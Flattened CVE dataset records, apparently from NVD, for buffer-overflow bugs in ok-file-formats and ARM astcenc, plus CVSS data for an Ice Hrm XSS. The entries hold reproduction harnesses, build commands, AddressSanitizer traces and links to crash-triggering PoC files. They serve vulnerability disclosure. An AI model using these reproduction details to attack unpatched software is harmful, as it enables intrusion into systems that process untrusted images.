[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ok-file-formats_project:ok-file-formats:2021-03-06:*:*:*:*:*:*:*", "matchCriteriaId": "7221E38B-D190-4EC5-BD11-C4A84647DBED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/brackeen/ok-file-formats/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "brackeen", "ok-file-formats" ]
# Version dev version, git clone https://github.com/brackeen/ok-file-formats.git # Environment Ubuntu 18.04, 64bit # Testcase ```c #include <stdio.h> #include <stdlib.h> #include "ok_jpg.h" #include "ok_jpg.c" int main(int _argc, char **_argv) { FILE *file = fopen("_argv[1]", "rb"); ok_jpg image = ok_jpg_read(file, OK_JPG_COLOR_FORMAT_RGBA); fclose(file); if (image.data) { printf("Got image! Size: %li x %li\n", (long)image.width, (long)image.height); free(image.data); } return 0; } ``` # Command Compile test program: ```bash $ gcc -g -o main main.c ok_jpg.h ``` Compile test program with address sanitizer with this command: ```bash $ gcc -g -fsanitize=address -fno-omit-frame-pointer -O1 -o Asanjpg main.c ok_jpg.h ``` # Result The result of running without ASAN: ```bash $ ./main heap-buffer-overflow-2.jpg double free or corruption (!prev) Aborted ``` Information obtained by using ASAN: ```bash $ ./Asanjpg heap-buffer-overflow-2.jpg ================================================================= ==3402==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x63000000024c at pc 0x5632c5205ffb bp 0x7ffc939581c0 sp 0x7ffc939581b0 WRITE of size 1 at 0x63000000024c thread T0 #0 0x5632c5205ffa in ok_jpg_convert_YCbCr_to_RGB /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:513 #1 0x5632c5205ffa in ok_jpg_convert_data_unit_color /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:545 #2 0x5632c5205ffa in ok_jpg_convert_data_unit /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:607 #3 0x5632c5212c3d in ok_jpg_decode_scan /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:1276 #4 0x5632c5212c3d in ok_jpg_read_sos /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:1742 #5 0x5632c5212c3d in ok_jpg_decode2 /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:1930 #6 0x5632c5212c3d in ok_jpg_decode /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:2004 #7 0x5632c52142dc in ok_jpg_read_with_allocator /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:268 #8 0x5632c5214412 in ok_jpg_read /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:257 #9 0x5632c52146b1 in main /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/main.c:10 #10 0x7f0ab88adbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) #11 0x5632c5203499 in _start (/home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/Asanjpg+0x1499) 0x63000000024c is located 436 bytes to the left of 60000-byte region [0x630000000400,0x63000000ee60) allocated by thread T0 here: #0 0x7f0ab8d5bb40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40) #1 0x5632c52037e1 in ok_stdlib_alloc /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:55 #2 0x5632c520ed69 in ok_jpg_read_sof /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:1613 #3 0x5632c520ed69 in ok_jpg_decode2 /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:1910 #4 0x5632c520ed69 in ok_jpg_decode /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:2004 #5 0x5632c52142dc in ok_jpg_read_with_allocator /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:268 #6 0x5632c5214412 in ok_jpg_read /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:257 #7 0x5632c52146b1 in main /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/main.c:10 #8 0x7f0ab88adbf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/nisl1/nisl8121/wjl/ok-file-formats/afl-test1/ok_jpg.c:513 in ok_jpg_convert_YCbCr_to_RGB Shadow bytes around the buggy address: 0x0c607fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff8000: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c607fff8040: fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa fa 0x0c607fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c607fff8080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c607fff8090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==3402==ABORTING ``` # Description A heap-buffer-overflow was discovered in ok_file_formats. The issue is being triggered in function ok_jpg_convert_YCbCr_to_RGB() at ok_jpg.c:513 # Poc Poc file is [this](https://github.com/NISL-SecurityGroup/NISL-BugDetection/blob/main/project/ok-file-formats/heap-buffer-overflow-2/heap-buffer-overflow-2.jpg).
heap-buffer-overflow in functionok_jpg_convert_YCbCr_to_RGB() at ok_jpg.c:513
https://api.github.com/repos/brackeen/ok-file-formats/issues/12/comments
1
2021-03-26T08:44:18Z
2021-04-05T22:46:03Z
https://github.com/brackeen/ok-file-formats/issues/12
841,726,465
12
3,246
CVE-2021-44339
2022-02-28T16:15:07.880
David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow. When the function of the ok-file-formats project is used, a heap-buffer-overflow occurred in function ok_png_transform_scanline() in "/ok_png.c:712".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ok-file-formats_project:ok-file-formats:2021-06-05:*:*:*:*:*:*:*", "matchCriteriaId": "FEF1A3E0-1854-4086-844E-05721E915556", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/brackeen/ok-file-formats/issues/15
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "brackeen", "ok-file-formats" ]
# Version [203defd](https://github.com/brackeen/ok-file-formats/commit/203defdfb2c8b1207a392493a09145c1b54bb070) # Environment Ubuntu 18.04,64 bit # Testcase ```c #include <stdio.h> #include <stdlib.h> #include "ok_png.c" #include "ok_png.h" int main(int _argc, char **_argv) { FILE *file = fopen(_argv[1], "rb"); ok_png image = ok_png_read(file, OK_PNG_COLOR_FORMAT_RGBA ); fclose(file); if (image.data) { printf("Got image! Size: %li x %li\n", (long)image.width, (long)image.height); free(image.data); } return 0; } ``` # Command Compile test program: ``` $ gcc -g -o main main.c ok_png.h ``` Compile test program with address sanitizer with this command: ``` $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h ``` # Result The result of running without ASAN: ``` $ ./main heap-buffer-overflow-3.png free(): invalid pointer Aborted (core dumped) ``` Information obtained by using ASAN: ``` $ ./asanpng heap-buffer-overflow-3.png ==8813==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000002680 at pc 0x0000004e48dc bp 0x7ffe51b2f890 sp 0x7ffe51b2f888 WRITE of size 4 at 0x621000002680 thread T0 #0 0x4e48db in ok_png_transform_scanline /docker/ok-file-formats-png/ok_png.c:712:13 #1 0x4e48db in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:895:13 #2 0x4e48db in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23 #3 0x4e48db in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5 #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9 #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12 #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20 #7 0x7fe87e6f50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #8 0x41c38d in _start (/docker/ok-file-formats-png/afl_asan+0x41c38d) 0x621000002680 is located 384 bytes to the right of 4096-byte region [0x621000001500,0x621000002500) allocated by thread T0 here: #0 0x4975ed in malloc (/docker/ok-file-formats-png/afl_asan+0x4975ed) #1 0x4cd004 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:774:29 #2 0x4cd004 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23 #3 0x4cd004 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5 #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9 #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12 #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20 #7 0x7fe87e6f50b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /docker/ok-file-formats-png/ok_png.c:712:13 in ok_png_transform_scanline Shadow bytes around the buggy address: 0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff84a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c427fff84d0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff8520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==8813==ABORTING ``` # Description A heap-buffer-overflow was discovered in ok_file_formats. The issue is being triggered in function ok_png_transform_scanline() at ok_png.c:712:13. # Poc Poc file is [this](https://github.com/nisl-bugTest/Pocfiles/blob/main/fuzzing/ok-file-formats/heap-buffer-overflow-3/poc).
heap-buffer-overflow in function ok_png_transform_scanline() at ok_png.c:712:13
https://api.github.com/repos/brackeen/ok-file-formats/issues/15/comments
1
2021-06-07T04:58:26Z
2022-05-09T10:32:12Z
https://github.com/brackeen/ok-file-formats/issues/15
913,089,593
15
3,247
CVE-2021-44331
2022-02-28T17:15:09.923
ARM astcenc 3.2.0 is vulnerable to Buffer Overflow in function encode_ise().
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ARM-software/astc-encoder/issues/294" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ARM-software/astc-encoder/issues/294" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:arm:adaptive_scalable_texture_compression_encoder:3.2.0:*:*:*:*:*:*:*", "matchCriteriaId": "DC0AA123-0F53-4A6E-980E-4539FBAB8242", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/ARM-software/astc-encoder/issues/294
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ARM-software", "astc-encoder" ]
# Version ``` astcenc v3.2.0, 64-bit sse2 ``` # Environment Ubuntu 18.04,64 bit # Command **Compile test program:** ```c++ $ mkdir build $ cd build $ cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release .. $ make -j8 ``` **Compile test program with address sanitizer:** - Update Makefile: ``` $ set(CMAKE_C_COMPILER "/usr/bin/gcc") $ set(CMAKE_CXX_COMPILER "/usr/bin/g++") $ set(CMAKE_C_FLAGS "-fsanitize=address") $ set(CMAKE_CXX_FLAGS "-fsanitize=address") ``` - Compile program: ``` $ mkdir -p asan_build $ cd asan_build $ cmake -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release .. $ make -j8 ``` # Result The result of running without ASAN: ``` $ ./astcenc-native -cl crash01 out1.astc 6x6 -medium Segmentation fault (core dumped) ``` Information obtained by using ASAN: ``` $ ./astcenc-native_asan -cl crash01 out1.astc 6x6 -medium ==10804==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7f5352492320 at pc 0x5602c3a3f015 bp 0x7f53524921e0 sp 0x7f53524921d0 READ of size 1 at 0x7f5352492320 thread T1 #0 0x5602c3a3f014 in encode_ise(quant_method, unsigned int, unsigned char const*, unsigned char*, unsigned int) (/docker/astc_test/te/Source/astcenc-native+0xee014) #1 0x5602c39eb36c in symbolic_to_physical(block_size_descriptor const&, symbolic_compressed_block const&, physical_compressed_block&) (/docker/astc_test/te/Source/astcenc-native+0x9a36c) #2 0x5602c3a19b07 in compress_image(astcenc_context&, unsigned int, astcenc_image const&, astcenc_swizzle const&, unsigned char*) (/docker/astc_test/te/Source/astcenc-native+0xc8b07) #3 0x5602c3a1e382 in astcenc_compress_image(astcenc_context*, astcenc_image*, astcenc_swizzle const*, unsigned char*, unsigned long, unsigned int) (/docker/astc_test/te/Source/astcenc-native+0xcd382) #4 0x5602c39cdc33 in compression_workload_runner(int, int, void*) (/docker/astc_test/te/Source/astcenc-native+0x7cc33) #5 0x5602c39cac53 in launch_threads_helper(void*) [clone .lto_priv.0] (/docker/astc_test/te/Source/astcenc-native+0x79c53) #6 0x7f5357c45608 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9608) #7 0x7f53580d4292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292) Address 0x7f5352492320 is located in stack of thread T1 at offset 96 in frame #0 0x5602c39ea13f in symbolic_to_physical(block_size_descriptor const&, symbolic_compressed_block const&, physical_compressed_block&) (/docker/astc_test/te/Source/astcenc-native+0x9913f) This frame has 3 object(s): [32, 48) 'weightbuf' (line 146) [64, 96) 'values_to_encode' (line 247) <== Memory access at offset 96 overflows this variable [128, 192) 'weights' (line 160) HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) Thread T1 created by T0 here: #0 0x7f53581fba95 in __interceptor_pthread_create (/lib/x86_64-linux-gnu/libasan.so.6+0x57a95) #1 0x5602c3a780b0 in launch_threads(int, void (*)(int, int, void*), void*) [clone .constprop.0] (/docker/astc_test/te/Source/astcenc-native+0x1270b0) SUMMARY: AddressSanitizer: stack-buffer-overflow (/docker/astc_test/te/Source/astcenc-native+0xee014) in encode_ise(quant_method, unsigned int, unsigned char const*, unsigned char*, unsigned int) Shadow bytes around the buggy address: 0x0feaea48a410: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a420: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a430: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a440: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a450: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 f2 f2 =>0x0feaea48a460: 00 00 00 00[f2]f2 f2 f2 00 00 00 00 00 00 00 00 0x0feaea48a470: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a4a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0feaea48a4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==10804==ABORTING ``` # Description ``` A stack-buffer-overflow was discovered in astcenc.The issue is being triggered in function encode_ise(). ``` # Poc Poc file is [this](https://github.com/NISL-SecurityGroup/NISL-BugDetection/blob/main/project/astc-encoder/stack-buffer-overflow-1/crash01).
stack-buffer-overflow in function encode_ise()
https://api.github.com/repos/ARM-software/astc-encoder/issues/294/comments
5
2021-10-22T05:11:46Z
2021-10-27T12:31:03Z
https://github.com/ARM-software/astc-encoder/issues/294
1,033,185,978
294
3,248
CVE-2021-44342
2022-02-28T17:15:09.970
David Brackeen ok-file-formats 203defd is vulnerable to Buffer Overflow via function ok_png_transform_scanline() in "/ok_png.c:494".
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/19" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/brackeen/ok-file-formats/issues/19" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ok-file-formats_project:ok-file-formats:2021-06-05:*:*:*:*:*:*:*", "matchCriteriaId": "FEF1A3E0-1854-4086-844E-05721E915556", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/brackeen/ok-file-formats/issues/19
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "brackeen", "ok-file-formats" ]
# Version [203defd](https://github.com/brackeen/ok-file-formats/commit/203defdfb2c8b1207a392493a09145c1b54bb070) # Environment Ubuntu 18.04,64 bit # Testcase ```c #include <stdio.h> #include <stdlib.h> #include "ok_png.c" #include "ok_png.h" int main(int _argc, char **_argv) { FILE *file = fopen(_argv[1], "rb"); ok_png image = ok_png_read(file, OK_PNG_COLOR_FORMAT_RGBA ); fclose(file); if (image.data) { printf("Got image! Size: %li x %li\n", (long)image.width, (long)image.height); free(image.data); } return 0; } ``` # Command Compile test program: ``` $ gcc -g -o main main.c ok_png.h ``` Compile test program with address sanitizer with this command: ``` $ gcc -g -fsanitize=address -o asanpng main.c ok_png.h ``` # Result The result of running without ASAN: ``` $ ./asanpng heap-buffer-overflow-7.png Segmentation fault (core dumped) ``` Information obtained by using ASAN: ``` $ ./asanpng heap-buffer-overflow-7.png ================================================================= ==1998==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000002500 at pc 0x0000004e3d62 bp 0x7ffe6e5d0b90 sp 0x7ffe6e5d0b88 WRITE of size 1 at 0x621000002500 thread T0 #0 0x4e3d61 in ok_png_transform_scanline /docker/ok-file-formats-png/ok_png.c:494:20 #1 0x4e3d61 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:895:13 #2 0x4e3d61 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23 #3 0x4e3d61 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5 #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9 #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12 #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20 #7 0x7f5e82a180b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #8 0x41c38d in _start (/docker/ok-file-formats-png/afl_asan+0x41c38d) 0x621000002500 is located 0 bytes to the right of 4096-byte region [0x621000001500,0x621000002500) allocated by thread T0 here: #0 0x4975ed in malloc (/docker/ok-file-formats-png/afl_asan+0x4975ed) #1 0x4cd004 in ok_png_read_data /docker/ok-file-formats-png/ok_png.c:774:29 #2 0x4cd004 in ok_png_decode2 /docker/ok-file-formats-png/ok_png.c:971:23 #3 0x4cd004 in ok_png_decode /docker/ok-file-formats-png/ok_png.c:1025:5 #4 0x4e81d5 in ok_png_read_with_allocator /docker/ok-file-formats-png/ok_png.c:188:9 #5 0x4e81d5 in ok_png_read /docker/ok-file-formats-png/ok_png.c:177:12 #6 0x4e81d5 in main /docker/ok-file-formats-png/main.c:8:20 #7 0x7f5e82a180b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /docker/ok-file-formats-png/ok_png.c:494:20 in ok_png_transform_scanline Shadow bytes around the buggy address: 0x0c427fff8450: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8460: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8470: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8480: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8490: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fff84a0:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1998==ABORTING ``` # Description A heap-buffer-overflow was discovered in ok_file_formats. The issue is being triggered in function ok_png_transform_scanline() at ok_png.c:494:20 # Poc Poc file is [this](https://github.com/nisl-bugTest/Pocfiles/blob/main/fuzzing/ok-file-formats/heap-buffer-overflow-7/poc).
heap-buffer-overflow in function ok_png_transform_scanline() at ok_png.c:494:20
https://api.github.com/repos/brackeen/ok-file-formats/issues/19/comments
1
2021-06-07T05:05:25Z
2022-05-09T10:33:54Z
https://github.com/brackeen/ok-file-formats/issues/19
913,093,988
19
3,249
CVE-2022-25013
2022-02-28T19:15:12.433
Ice Hrm 30.0.0.OS was discovered to contain multiple reflected cross-site scripting (XSS) vulnerabilities via the "key" and "fm" parameters in the component login.php.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
